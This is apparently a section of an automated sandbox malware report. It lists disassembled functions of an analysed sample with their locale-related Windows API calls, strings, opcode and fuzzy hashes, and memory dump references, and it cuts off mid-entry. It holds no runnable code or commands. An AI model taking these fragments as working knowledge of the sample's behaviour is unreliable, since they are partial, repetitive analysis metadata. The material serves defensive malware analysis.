Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 9b7f64dc0ed3d2801c4d786bcfc82a979792021f9f773e8531f6bd01a77694ab
Instruction ID: 1c028ff6c60ba21a284a7ec31f07e6b2312fcbc8ba0086e4deff68df6310f770
Opcode Fuzzy Hash: 9b7f64dc0ed3d2801c4d786bcfc82a979792021f9f773e8531f6bd01a77694ab
Instruction Fuzzy Hash: C9F0E5B6221104FFEB089B85CC4BDAB37ACEF08B84F104019B501D6080E2F0AF108771

Uniqueness

Uniqueness Score: -1.00%

Function 002CF352 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002CF3A6

Strings

E-<E, xrefs: 002CF35D

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: E-<E
API String ID: 2299586839-3361631808
Opcode ID: 49c20f07e9cdf40a9af089a8e326ba2529ace6d143335775d366c6650b4ce4d2
Instruction ID: 46cbae2025ed6a5f4ae12bf85e035557dc0b74d63e12be94bb366d0935bc99d2
Opcode Fuzzy Hash: 49c20f07e9cdf40a9af089a8e326ba2529ace6d143335775d366c6650b4ce4d2
Instruction Fuzzy Hash: 5621A172624246ABDB28AE25DD42F7B73ADEB44314F1042BEFE01D6141EB74ED218B90

Uniqueness

Uniqueness Score: -1.00%

Function 002C1573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_0009155D,00000001,002F9E48,0000000C), ref: 002C15AB

Strings

E-<E, xrefs: 002C15B3

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID: E-<E
API String ID: 2099609381-3361631808
Opcode ID: 1e5fd8e9662e444cfe949c527cdf07679ce2c4b1e472ab968eeef4048beae783
Instruction ID: 0ea1fda39022386e41b250f081abcb5357de1e5bb85e8d9c63a5e2b2754d5315
Opcode Fuzzy Hash: 1e5fd8e9662e444cfe949c527cdf07679ce2c4b1e472ab968eeef4048beae783
Instruction Fuzzy Hash: 86F03772A24204DFDB01DF98E886B9DB7E4EB49721F00812AF8019B2A0CBB95914CF80

Uniqueness

Uniqueness Score: -1.00%

Function 002C1762 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_0009155D,00000001), ref: 002C177C

Strings

E-<E, xrefs: 002C1782

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID: E-<E
API String ID: 2099609381-3361631808
Opcode ID: 8ca50113d8498e3708b3d178fc1f80997cefb97f6b2548f370a8ed0be4e9a527
Instruction ID: 898c63dde8dc6e8829b12657a27ecbb26139fdfa3ad7cbb9e7218c6cc518ccf5
Opcode Fuzzy Hash: 8ca50113d8498e3708b3d178fc1f80997cefb97f6b2548f370a8ed0be4e9a527
Instruction Fuzzy Hash: 92D0A731404304ABCB055F16FC8BA043BADE381311F008029F4080A2B0DEB16851CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002AFF78 Relevance: 3.3, Strings: 1, Instructions: 2026COMMON

Download Yara Rule

Strings

E-<E, xrefs: 002AFF83

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: E-<E
API String ID: 0-3361631808
Opcode ID: 94110946f1931d51e981b952e6fb180627b7ac9bf2a9aa0403e058feebbffe8c
Instruction ID: 1a4bc2ca904ee0787a715f1e6f01803d28b40f1df014f32854db0a1a07994c31
Opcode Fuzzy Hash: 94110946f1931d51e981b952e6fb180627b7ac9bf2a9aa0403e058feebbffe8c
Instruction Fuzzy Hash: 92036071E2122A9FDB25CF68CC907EAB7B9AB88344F5441EAD44DE7241D7709FA18F40

Uniqueness

Uniqueness Score: -1.00%

Function 0029F60E Relevance: 2.9, Strings: 2, Instructions: 392COMMON

Download Yara Rule

Strings

E-<E, xrefs: 0029F616
0, xrefs: 0029F7B2

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E-<E
API String ID: 0-1759747734
Opcode ID: beb982942d457c218d4299b0ec0ea17abd95d58e30c78584ab9915f020ae3961
Instruction ID: d318399f118279a43008247e22e4e2878ba9d44c68971a10b1c776814912fb7b
Opcode Fuzzy Hash: beb982942d457c218d4299b0ec0ea17abd95d58e30c78584ab9915f020ae3961
Instruction Fuzzy Hash: B8E1AC706207068FCFE4CF68C680AAAB7B1BF49314F24466DD466DB2A0D770AD66CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0029F0E5 Relevance: 2.9, Strings: 2, Instructions: 388COMMON

Download Yara Rule

Strings

E-<E, xrefs: 0029F0ED
0, xrefs: 0029F27A

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E-<E
API String ID: 0-1759747734
Opcode ID: 7bf8a3924f78b8b8caf2ad5395cf1456a0fa2e84957cef60f5c786fbc32ce1db
Instruction ID: 0823bf012605fcefa66feb7f22d6e06bc5ba07ef3d15e92a18427605e46f6d99
Opcode Fuzzy Hash: 7bf8a3924f78b8b8caf2ad5395cf1456a0fa2e84957cef60f5c786fbc32ce1db
Instruction Fuzzy Hash: B3E1BD74A20606CFCFE4CF68C680AAAB7B1FF49310F244669D95ADB290D770ED61CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0029FB4A Relevance: 2.9, Strings: 2, Instructions: 388COMMON

Download Yara Rule

Strings

E-<E, xrefs: 0029FB52
0, xrefs: 0029FCDF

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E-<E
API String ID: 0-1759747734
Opcode ID: 7ff26869b21beb2a06ed94785a4e5798cf6b2a6dd4000f868862acb4ba716f01
Instruction ID: 5aa30c33f6492604a856434033e81cb23c4e12692f20f5eb7d182264eee208b3
Opcode Fuzzy Hash: 7ff26869b21beb2a06ed94785a4e5798cf6b2a6dd4000f868862acb4ba716f01
Instruction Fuzzy Hash: 12E1BF7062060A8FCFE4CF28C690AAEB7F1BF49314F24866AD456DB691D730ED61CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0029DB23 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

E-<E, xrefs: 0029DB2B
0, xrefs: 0029DCC0

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E-<E
API String ID: 0-1759747734
Opcode ID: 5a3be0572987972235693e8456869a0496247cf93c85f447df74f5880f8d179b
Instruction ID: 94d1109a2ec221082327e0ad1799d904e72fd3d7dbfa2037ac69593c5dcf68e6
Opcode Fuzzy Hash: 5a3be0572987972235693e8456869a0496247cf93c85f447df74f5880f8d179b
Instruction Fuzzy Hash: 41C1FE70A2060B8FCF28CF68C4906BEB7B2EF45314F24461ED5869B791C770AD65EB91

Uniqueness

Uniqueness Score: -1.00%

Function 0029D6B2 Relevance: 2.8, Strings: 2, Instructions: 344COMMON

Download Yara Rule

Strings

E-<E, xrefs: 0029D6BA
0, xrefs: 0029D840

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E-<E
API String ID: 0-1759747734
Opcode ID: ae91fff02bb1157dc2efa8b0fe61f0adba51aab904183d110747b42ce02c08f1
Instruction ID: 50e73ce27201dbdba230dbd0ae49d6d3212ec3496d63ed9ac0949ed2f713bd9e
Opcode Fuzzy Hash: ae91fff02bb1157dc2efa8b0fe61f0adba51aab904183d110747b42ce02c08f1
Instruction Fuzzy Hash: E8C1FF74A206078FCF28DFA8C4946BEF7B2BF05300F64461DD4969B292C730AD66EB51

Uniqueness

Uniqueness Score: -1.00%

Function 0029DFA7 Relevance: 2.8, Strings: 2, Instructions: 344COMMON

Download Yara Rule

Strings

E-<E, xrefs: 0029DFAF
0, xrefs: 0029E135

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E-<E
API String ID: 0-1759747734
Opcode ID: b1e904b5fab578ecace9031738a9896f092394e0986488f5dd6c536da6593edb
Instruction ID: 3b543a762c0a253417ad8a49a4c4df7f3bdbc0e0d0fe04b4f644206b555a9ebe
Opcode Fuzzy Hash: b1e904b5fab578ecace9031738a9896f092394e0986488f5dd6c536da6593edb
Instruction Fuzzy Hash: A6C1E070A206468FCF28CF68C48567EBBB5BF05300F16461DD89AAB391C7B1ED65CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0029E856 Relevance: 2.8, Strings: 2, Instructions: 326COMMON

Download Yara Rule

Strings

E-<E, xrefs: 0029E85E
0, xrefs: 0029E9FD

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E-<E
API String ID: 0-1759747734
Opcode ID: 9ca74be02ac92b3a1a573e1f1f4428d38046ea304e9d5972fe7b04be0c224b27
Instruction ID: 3eb83f8534a3f5231c2aff9f5368c32d25a4fc23ad0f6c5241f495d9f19e5c2b
Opcode Fuzzy Hash: 9ca74be02ac92b3a1a573e1f1f4428d38046ea304e9d5972fe7b04be0c224b27
Instruction Fuzzy Hash: 71B1EF70A2060B8BDF24DFA8C590ABEB7F1BF44304F15491EE496A76A0D730ED66CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0029E418 Relevance: 2.8, Strings: 2, Instructions: 322COMMON

Download Yara Rule

Strings

0, xrefs: 0029E5B0
E-<E, xrefs: 0029E420

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E-<E
API String ID: 0-1759747734
Opcode ID: 836e8cea12e83c80d1efe492a3902e244dcef5de47329a321af59675a27225d6
Instruction ID: b91dcfb07b278ac149600e6ee670265d7a7ed0cee1b1b869c611bbf0c303c401
Opcode Fuzzy Hash: 836e8cea12e83c80d1efe492a3902e244dcef5de47329a321af59675a27225d6
Instruction Fuzzy Hash: 2BB112B0A2060A8ACF34CFA8C580ABEB7F1BF44708F52591DD496E7290D731ED65CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0029ECA7 Relevance: 2.8, Strings: 2, Instructions: 322COMMON

Download Yara Rule

Strings

0, xrefs: 0029EE3F
E-<E, xrefs: 0029ECAF

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E-<E
API String ID: 0-1759747734
Opcode ID: 36e5da1045bd1dbf3616d0a2955d2e3dfd9c437bbe97ddc58f5bcd2ec3836286
Instruction ID: 0ae39871e44768039e42c822919b36f1e6f045cb1b40ba4f49b3e6275e70eaa9
Opcode Fuzzy Hash: 36e5da1045bd1dbf3616d0a2955d2e3dfd9c437bbe97ddc58f5bcd2ec3836286
Instruction Fuzzy Hash: 50B10170A2060B8BCF34DF68C584ABEB7F5BF44314F15492EE486A7690D730AD66CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0029CE6C Relevance: 2.8, Strings: 2, Instructions: 318COMMON

Download Yara Rule

Strings

E-<E, xrefs: 0029CE74
0, xrefs: 0029D005

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E-<E
API String ID: 0-1759747734
Opcode ID: e04b55fe2a10d63c8d55536e835486292d4c0ef78607009adaba219dd517d15c
Instruction ID: 4a57260bdf98e2591eabab003c71ae69fb78b79378c2f5b2119c05d0d780d936
Opcode Fuzzy Hash: e04b55fe2a10d63c8d55536e835486292d4c0ef78607009adaba219dd517d15c
Instruction Fuzzy Hash: DFB104B192060B8BCF24CF68C4556BEB7F2AF00300F24061EE496E7691C735EE66DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0029CA52 Relevance: 2.8, Strings: 2, Instructions: 314COMMON

Download Yara Rule

Strings

E-<E, xrefs: 0029CA5A
0, xrefs: 0029CBDC

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
